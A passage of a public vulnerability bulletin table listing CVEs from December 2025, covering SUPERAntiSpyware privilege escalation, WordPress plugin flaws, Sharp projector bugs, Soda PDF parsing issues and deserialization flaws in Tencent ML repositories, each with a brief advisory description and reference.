| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27657. | 2025-12-23 | not yet calculated | CVE-2025-14488 | ZDI-25-1167 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27658. | 2025-12-23 | not yet calculated | CVE-2025-14489 | ZDI-25-1165 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27659. | 2025-12-23 | not yet calculated | CVE-2025-14490 | ZDI-25-1166 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27660. | 2025-12-23 | not yet calculated | CVE-2025-14491 | ZDI-25-1164 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27668. | 2025-12-23 | not yet calculated | CVE-2025-14492 | ZDI-25-1172 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675. | 2025-12-23 | not yet calculated | CVE-2025-14493 | ZDI-25-1170 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27676. | 2025-12-23 | not yet calculated | CVE-2025-14494 | ZDI-25-1163 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27677. | 2025-12-23 | not yet calculated | CVE-2025-14495 | ZDI-25-1169 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27678. | 2025-12-23 | not yet calculated | CVE-2025-14496 | ZDI-25-1171 |
| RealDefense--SUPERAntiSpyware | RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27680. | 2025-12-23 | not yet calculated | CVE-2025-14497 | ZDI-25-1168 |
| Rhys Wynne--WP Email Capture | Cross-Site Request Forgery (CSRF) vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Cross Site Request Forgery. This issue affects WP Email Capture: from n/a through <= 3.12.5. | 2025-12-24 | not yet calculated | CVE-2025-68529 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Rustaurius--Five Star Restaurant Reservations | Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Five Star Restaurant Reservations restaurant-reservations allows Cross Site Request Forgery. This issue affects Five Star Restaurant Reservations: from n/a through <= 2.7.7. | 2025-12-24 | not yet calculated | CVE-2025-68601 | https://vdp.patchstack.com/database/Wordpress/Plugin/restaurant-reservations/vulnerability/wordpress-five-star-restaurant-reservations-plugin-2-7-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| SALESmanago--SALESmanago | Missing Authorization vulnerability in SALESmanago SALESmanago salesmanago allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SALESmanago: from n/a through <= 3.9.0. | 2025-12-24 | not yet calculated | CVE-2025-68571 | https://vdp.patchstack.com/database/Wordpress/Plugin/salesmanago/vulnerability/wordpress-salesmanago-plugin-3-9-0-broken-access-control-vulnerability?_s_id=cve |
| Sante--PACS Server | Sante PACS Server HTTP Content-Length Header Handling NULL Pointer Dereference Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of HTTP Content-Length header. The issue results from the lack of proper validation of a pointer prior to accessing it. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-26770. | 2025-12-23 | not yet calculated | CVE-2025-14501 | ZDI-25-1104 |
| Scott Paterson--Accept Donations with PayPal | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Scott Paterson Accept Donations with PayPal easy-paypal-donation allows Phishing. This issue affects Accept Donations with PayPal: from n/a through <= 1.5.1. | 2025-12-24 | not yet calculated | CVE-2025-68602 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-paypal-donation/vulnerability/wordpress-accept-donations-with-paypal-plugin-1-5-1-open-redirection-vulnerability?_s_id=cve |
| Senstar--Symphony | Senstar Symphony FetchStoredLicense Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Senstar Symphony. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of FetchStoredLicense method. The issue results from the exposure of sensitive information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26908. | 2025-12-23 | not yet calculated | CVE-2025-12491 | ZDI-25-1060 |
| Sharp Display Solutions, Ltd.--Media Player MP-01 | Missing Authentication for Critical Function vulnerability in Sharp Display Solutions Media Player MP-01 All Verisons allows a attacker may access to the web interface of the affected product without authentication and change settings or perform other operations, and deliver content from the authoring software to the affected product without authentication. | 2025-12-22 | not yet calculated | CVE-2025-12049 | https://sharp-displays.jp.sharp/global/support/info/MP01-CVE-2025-12049.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Path Traversal vulnerability in Sharp Display Solutions projectors allows a attacker may access and read any files within the projector. | 2025-12-22 | not yet calculated | CVE-2025-11540 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs. | 2025-12-22 | not yet calculated | CVE-2025-11541 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs. | 2025-12-22 | not yet calculated | CVE-2025-11542 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-P502H, NP-P502W, NP-P452H, NP-P452W, NP-P502HG, NP-P502WG, NP-P452HG, NP-P452WG, NP-P502H+, NP-P502W+, NP-CR5450H, NP-CR5450W, NP-P502HL, NP-P502WL, NP-P502HLG, NP-P502WLG, NP-P502HL+, NP-P502WL+, NP-CR5450HL, NP-CR5450WL, NP-UM352W, NP-UM352WG, NP-UM352W+ | Improper Validation of Integrity Check Value vulnerability in Sharp Display Solutions projectors allows a attacker may create and run unauthorized firmware. | 2025-12-22 | not yet calculated | CVE-2025-11543 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11540.html |
| Sharp Display Solutions, Ltd.--NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+, NP-CG6500UL, NP-CG6500WL, NP-CB4500UL, NP-CB4500WL, NP-P525ULH, NP-P525WLH, NP-P605ULH, NP-P554U, NP-P554UG, NP-P554U+, NP-P554W, NP-P554WG, NP-P554W+, NP-P474U, NP-P474UG, NP-P474W, NP-P474WG, NP-P604XG, NP-P604X+, NP-P603XG, NP-P523X+, NP-PE523XG, NP-PE523X+, NP-CF6600U, NP-CF6600W, NP-CF6700X, NP-CF6500X, NP-CB4600U, NP-P554UH, NP-P554WH, NP-P474UH, NP-P474WH, NP-P604XH, NP-P603XH, NP-PE523XH, NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG ,NP-ME401W, NP-ME361W, NP-ME331W, NP-ME301W, NP-ME401X, NP-ME361X, NP-ME331X, NP-ME301X, NP-ME401WG, NP-ME361WG, NP-ME331WG, NP-ME301WG, NP-ME401XG, NP-ME361XG, NP-ME331XG, NP-ME301XG, NP-CA4155W, NP-CA4350X, NP-CA4255X, NP-CA4155X, NP-CA4115X, NP-MC331WG, NP-MC421XG, NP-MC401XG, NP-MC371XG, NP-MC331XG, NP-MC301XG, NP-CK4155W, NP-CK4255X, NP-CK4155X, NP-CK4055X, NP-CM4150X, NP-CM4050X, NP-CK4155WG, NP-CK4255XG, NP-CK4155XG, NP-CR2165W, NP-CR2305X, NP-CR2275X, NP-CR2165X, NP-CR2155X, NP-CD2115X, NP-CD2105X, NP-CM4151X, NP-CR2276X, NP-CD2116X, NP-P502H, NP-P502W, NP-P452H, NP-P452W | Improper Validation of Integrity Check Value vulnerability in Sharp Display Solutions projectors allows a attacker may create and run unauthorized firmware. | 2025-12-22 | not yet calculated | CVE-2025-11544 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11544.html |
| Sharp Display Solutions, Ltd.--NP-PA1705UL-W, NP-PA1705UL-W+, NP-PA1705UL-B, NP-PA1705UL-B+, NP-PA1505UL-W, NP-PA1505UL-W+, NP-PA1505UL-B, NP-PA1505UL-B+, NP-PA1505UL-BJL NP-PV800UL-W, NP-PV800UL-W+, NP-PV800UL-B, NP-PV800UL-B+, NP-PV710UL-W, NP-PV710UL-W+, NP-PV710UL-B, NP-PV710UL-B+, NP-PV800UL-W1, NP-PV800UL-B1, NP-PV710UL-W1, NP-PV710UL-B1, NP-PV800UL-B1G, NP-PV710UL-B1G, NP-PV800UL-WH, NP-PV710UL-WH, NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH NP-PV710UL+ NP-PA1004UL-W, NP-PA1004UL-WG, NP-PA1004UL-W+, NP-PA1004UL-WH, NP-PA1004UL-B, NP-PA1004UL-BG, NP-PA1004UL-B+, NP-PA804UL-W, NP-PA804UL-WG, NP-PA804UL-W+, NP-PA804UL-WH, NP-PA804UL-B, NP-PA804UL-BG, NP-PA804UL-B+, NP-PA1004UL-BH, NP-PA804UL-BH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG NP-CU4300XD, NP-CU4200XD, NP-CU4200WD, NP-UM383WL, NP-UM383WLG, NP-CJ2200WD, NP-PH3501QL, NP-PH3501QL+, NP-PH2601QL, NP-PH2601QL+, NP-PH350Q40L, NP-PH260Q30L, NP-PX1005QL-W, NP-PX1005QL-B, NP-PX1005QL-B+, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+ | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Sharp Display Solutions projectors allows a attacker may improperly access the HTTP server and execute arbitrary actions. | 2025-12-22 | not yet calculated | CVE-2025-11545 | https://sharp-displays.jp.sharp/global/support/info/PJ-CVE-2025-11545.html |
| siyuan-note--siyuan | SiYuan is self-hosted, open source personal knowledge management software. In versions 3.5.1 and prior, the SiYuan Note application utilizes a hardcoded cryptographic secret for its session store. This unsafe practice renders the session encryption ineffective. Since the sensitive AccessAuthCode is stored within the session cookie, an attacker who intercepts or obtains a user's encrypted session cookie (e.g., via session hijacking) can locally decrypt it using the public key. Once decrypted, the attacker can retrieve the AccessAuthCode in plain text and use it to authenticate or take over the session. | 2025-12-27 | not yet calculated | CVE-2025-68948 | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f7ph-rc3w-qp28 |
| Soda PDF--Desktop | Soda PDF Desktop Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Soda PDF Desktop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-25793. | 2025-12-23 | not yet calculated | CVE-2025-14406 | ZDI-25-1079 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Memory Corruption Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27141. | 2025-12-23 | not yet calculated | CVE-2025-14407 | ZDI-25-1080 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27143. | 2025-12-23 | not yet calculated | CVE-2025-14408 | ZDI-25-1081 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27120. | 2025-12-23 | not yet calculated | CVE-2025-14409 | ZDI-25-1082 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27142. | 2025-12-23 | not yet calculated | CVE-2025-14410 | ZDI-25-1083 |
| Soda PDF--Desktop | Soda PDF Desktop PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27140. | 2025-12-23 | not yet calculated | CVE-2025-14411 | ZDI-25-1084 |
| Soda PDF--Desktop | Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495. | 2025-12-23 | not yet calculated | CVE-2025-14412 | ZDI-25-1085 |
| Soda PDF--Desktop | Soda PDF Desktop CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27509. | 2025-12-23 | not yet calculated | CVE-2025-14413 | ZDI-25-1086 |
| Soda PDF--Desktop | Soda PDF Desktop Word File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Word files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27496. | 2025-12-23 | not yet calculated | CVE-2025-14414 | ZDI-25-1087 |
| Soda PDF--Desktop | Soda PDF Desktop Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27494. | 2025-12-23 | not yet calculated | CVE-2025-14415 | ZDI-25-1088 |
| Spider Themes--BBP Core | Missing Authorization vulnerability in Spider Themes BBP Core bbp-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BBP Core: from n/a through <= 1.4.1. | 2025-12-24 | not yet calculated | CVE-2025-68572 | https://vdp.patchstack.com/database/Wordpress/Plugin/bbp-core/vulnerability/wordpress-bbp-core-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve |
| Spiffy Plugins--Spiffy Calendar | Missing Authorization vulnerability in Spiffy Plugins Spiffy Calendar spiffy-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Spiffy Calendar: from n/a through <= 5.0.7. | 2025-12-24 | not yet calculated | CVE-2025-68523 | https://vdp.patchstack.com/database/Wordpress/Plugin/spiffy-calendar/vulnerability/wordpress-spiffy-calendar-plugin-5-0-7-broken-access-control-vulnerability?_s_id=cve |
| sunshinephotocart--Sunshine Photo Cart | Missing Authorization vulnerability in sunshinephotocart Sunshine Photo Cart sunshine-photo-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sunshine Photo Cart: from n/a through <= 3.5.7.1. | 2025-12-24 | not yet calculated | CVE-2025-68535 | https://vdp.patchstack.com/database/Wordpress/Plugin/sunshine-photo-cart/vulnerability/wordpress-sunshine-photo-cart-plugin-3-5-7-1-broken-access-control-vulnerability?_s_id=cve |
| Syed Balkhi--User Feedback | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Syed Balkhi User Feedback userfeedback-lite allows Blind SQL Injection. This issue affects User Feedback: from n/a through <= 1.10.1. | 2025-12-24 | not yet calculated | CVE-2025-68496 | https://vdp.patchstack.com/database/Wordpress/Plugin/userfeedback-lite/vulnerability/wordpress-user-feedback-plugin-1-10-1-sql-injection-vulnerability?_s_id=cve |
| Tencent--FaceDetection-DSFD | Tencent FaceDetection-DSFD resnet Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent FaceDetection-DSFD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the resnet endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27197. | 2025-12-23 | not yet calculated | CVE-2025-13715 | ZDI-25-1183 vendor-provided URL |
| Tencent--Hunyuan3D-1 | Tencent Hunyuan3D-1 load_pretrained Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent Hunyuan3D-1. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the load_pretrained function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27191. | 2025-12-23 | not yet calculated | CVE-2025-13713 | ZDI-25-1027 vendor-provided URL |
| Tencent--HunyuanDiT | Tencent HunyuanDiT model_resume Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the model_resume function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27183. | 2025-12-23 | not yet calculated | CVE-2025-13707 | ZDI-25-1029 vendor-provided URL |
| Tencent--HunyuanDiT | Tencent HunyuanDiT merge Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27190. | 2025-12-23 | not yet calculated | CVE-2025-13712 | ZDI-25-1028 vendor-provided URL |
| Tencent--HunyuanVideo | Tencent HunyuanVideo load_vae Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanVideo. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the load_vae function.The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27186. | 2025-12-23 | not yet calculated | CVE-2025-13710 | ZDI-25-1030 vendor-provided URL |
| Tencent--MedicalNet | Tencent MedicalNet generate_model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MedicalNet. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the generate_model function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27192. | 2025-12-23 | not yet calculated | CVE-2025-13714 | ZDI-25-1031 vendor-provided URL |
| Tencent--MimicMotion | Tencent MimicMotion create_pipeline Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent MimicMotion. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the create_pipeline function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27208. | 2025-12-23 | not yet calculated | CVE-2025-13716 | ZDI-25-1032 vendor-provided URL |
| Tencent--NeuralNLP-NeuralClassifier | Tencent NeuralNLP-NeuralClassifier _load_checkpoint Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent NeuralNLP-NeuralClassifier. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the _load_checkpoint function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27184. | 2025-12-23 | not yet calculated | CVE-2025-13708 | ZDI-25-1033 vendor-provided URL |
